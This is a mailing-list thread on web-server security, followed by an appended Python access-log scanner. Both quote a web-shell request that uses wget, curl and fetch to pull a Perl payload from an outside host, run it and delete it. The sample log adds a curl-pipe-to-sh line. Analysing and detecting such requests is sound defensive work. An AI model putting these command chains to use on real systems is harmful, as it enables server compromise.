[Info-vax] Using VMS for a web server
Jan-Erik Soderholm
jan-erik.soderholm at telia.com
Tue Jun 9 17:08:44 EDT 2015
Bill Gunshannon wrote on 2015-06-09 16:49:
> In article <ml6qf1$d82$1 at news.albasani.net>,
> Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
>>
>>
>> It would be nice to have a reproducer and test it out.
>> Or at least a pointer to a description.
>>
> ....
>>
>> OK. I have only read quite a lot about PHP and it's "problems"
>> but never used it or had it installed on any server.
>>
>> But it would surprise me *a lot* if there wasn't an available
>> fix for a simple URL based exploit...
>
> OK, I wasn't busy (some of these updates are like watching paint dry!)
> so here is just one to look at.
>
> First, a log entry (sanitized a bit as I don't really need someone else
> trying this):
>
> 103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
>
>
> Now, let's pull out the applicable part:
>
> "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1"
>
> Now we analyze it:
>
> "GET /xxxxxxxxxx/xxxxxxx/revslider/temp/update_extract/revslider/XXXXXX.php
>
> There is a request to get a PHP script.
>
> Note immediately after this part is "?cmd=" Hmmmmmm......
>
> And what is the command?
>
> wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt*
>
> And if we break it down:
>
> wget%20http://identerprise.co.kr/css/qtalk.txt;
>
> curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;
>
> fetch%20http://identerprise.co.kr/css/b.txt;
>
> perl%20qtalk.txt;
>
> rm%20-rf%20qtalk.txt*
>
>
> So, the attacker uses a hole in PHP to download a Perl script, using three
> common ways of doing it (I don't know if any of these are available on VMS
> but I suspect curl or wget might be). He then runs it. And when he is done
> he cleans up his tracks.
>
> What does it do? No idea. The point is to show something that PHP allows
> as a "feature" that makes it probably the worst possible web scripting
> language.
>
> I have seen this method used to download a telnet daemon written in either
> PHP or Perl. This allows outsiders who do not have an account on a system
> to get in for a look around. Good way to look for security shortcomings.
>
> bill
>
OK. That needs a script called wawalo.php already being on the server
in a directory where the server can execute it. The exploit is really
to be able to upload the wawalo.php file in the first place.
If you have a server setup where someone can both upload a random
file and then also execute that file just like that from the same
directory, you have a severe problem.
Now, is this a "hole in PHP"? Or could the same thing be done
using any tool that can take an input parameter and execute it?
I guess any scripting tool could be used to write such a script.
Many scripting languages are able to take a string and execute it.
Can this be done on a WASD/VMS server? Not if you do not have
file upload enabled, at least. And you also need execute rights
on the upload directory. You can also set it up so that PHP
scripts can only be executed from a safe "script" directory
with no external write access.
But again, is it really a "hole in PHP" ?? I'm not sure...
Jan-Erik.
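The analysis Bill walks through above (pull the request out of the log, find the `?cmd=` parameter, decode it, break it at the semicolons) can be run mechanically over a whole access log. The Python below is an added example for this thread, not code from the original posts or from WASD/PHP. It scans the log line quoted above plus two constructed lines (the 192.0.2.10 and 203.0.113.5 addresses are RFC 5737 documentation addresses and the requests on them are made up), decodes each query parameter without treating `;` as a parameter separator, splits the value into command stages, and flags parameters where two or more stages begin with a downloader, interpreter or cleanup command. The log regex, the command list and the "two stages" threshold are assumptions of this example. The status code is carried along because the quoted request got a 404 (no wawalo.php on that server); a 2xx on the same request is the case Jan-Erik describes, where the file was already uploaded and executable.

```python
import re
from urllib.parse import unquote_plus

# Combined log format (assumed layout; matches the line quoted in the thread).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Commands an injected "cmd=" string typically chains: fetch, run, clean up.
# This list is an assumption of the example, extend it for your environment.
STAGE_RE = re.compile(
    r'^\s*(wget|curl|fetch|lynx|perl|python|php|sh|bash|rm)\b', re.I
)

# Shell separators: ';', '&&', '||', '|'
SEP_RE = re.compile(r';|&&|\|\||\|')


def parse_query(qs):
    """Decode a query string by hand, splitting only on '&'.

    urllib.parse.parse_qs also split on ';' in older Python versions, which
    would silently chop an injected command chain into separate parameters.
    """
    params = {}
    for pair in qs.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def parse_line(line):
    """Return a dict of log fields, with the request target split into path and params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    path, _, qs = entry["target"].partition("?")
    entry["path"] = path
    entry["params"] = parse_query(qs)
    return entry


def split_stages(cmd):
    """Break a decoded shell string into its individual commands."""
    return [s.strip() for s in SEP_RE.split(cmd) if s.strip()]


def suspicious_params(entry):
    """Map parameter name -> stages for values that look like chained shell commands."""
    hits = {}
    for name, values in entry["params"].items():
        for value in values:
            stages = split_stages(value)
            shellish = [s for s in stages if STAGE_RE.match(s)]
            if len(shellish) >= 2:
                hits[name] = stages
    return hits


def scan(lines):
    """Return one finding per log line carrying a command chain in a query parameter."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        hits = suspicious_params(entry)
        if hits:
            findings.append({"ip": entry["ip"], "path": entry["path"],
                             "status": entry["status"], "params": hits})
    return findings


# First line is the one quoted in the thread; the other two are constructed.
SAMPLE_LOG = [
    '103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"',
    '192.0.2.10 - - [14/Mar/2015:20:40:01 -0400] "GET /index.php?page=news&id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [14/Mar/2015:21:02:17 -0400] "GET /uploads/x.php?cmd=curl%20http://203.0.113.5/x.sh%7Csh HTTP/1.1" 200 31 "-" "curl/7.38.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["status"], f["path"])
        for name, stages in f["params"].items():
            print("  %s=" % name)
            for s in stages:
                print("    ", s)
```

Running it prints the two flagged requests with their stages broken out exactly as in Bill's manual breakdown; the benign `index.php` request is not reported. Filtering the findings to 2xx statuses gives the list of requests that actually reached an executable script, which is the condition Jan-Erik's reply is about.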